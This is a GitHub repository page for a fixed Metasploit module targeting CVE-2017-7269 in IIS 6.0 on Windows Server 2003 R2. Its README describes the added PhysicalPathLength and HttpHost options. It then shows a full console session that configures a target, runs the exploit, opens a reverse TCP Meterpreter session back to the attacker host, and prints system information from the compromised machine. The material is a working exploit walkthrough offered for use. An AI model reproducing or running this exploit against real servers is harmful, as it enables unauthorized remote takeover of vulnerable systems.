fixed msf module for cve-2017-7269
Switch branches/tags
Nothing to show
Clone or download
zcgonvh public
fixed msf module for cve-2017-7269
Latest commit 16e8c38 Mar 30, 2017
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md public Mar 30, 2017
cve-2017-7269.rb public Mar 30, 2017

README.md

fixed msf module for cve-2017-7269

fix not work when length of physical path not equal to 19,or has a host binding.

add options: PhysicalPathLength,HttpHost

for test: host phyiscal path: c:\inetpub\ , length=11

msf > use exploit/windows/iis/cve-2017-7269
msf exploit(cve-2017-7269) > show options

Module options (exploit/windows/iis/cve-2017-7269):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   HttpHost            localhost        yes       http host for target
   PhysicalPathLength  19               yes       length of physical path for target(include backslash)
   RHOST                                yes       The target address
   RPORT               80               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2


msf exploit(cve-2017-7269) > set rhost 192.168.223.130
rhost => 192.168.223.130
msf exploit(cve-2017-7269) > set rport 8088
rport => 8088
msf exploit(cve-2017-7269) > set physicalpathlength 11
physicalpathlength => 11
msf exploit(cve-2017-7269) > set httphost zcgonvh-test.com
httphost => zcgonvh-test.com
msf exploit(cve-2017-7269) > exploit

[*] Started reverse TCP handler on 192.168.223.129:4444 
[*] Sending stage (957487 bytes) to 192.168.223.130
[*] Meterpreter session 1 opened (192.168.223.129:4444 -> 192.168.223.130:1135) at 2017-03-30 18:13:41 -0400

meterpreter > sysinfo
Computer        : ZCG-AA4B4E60208
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >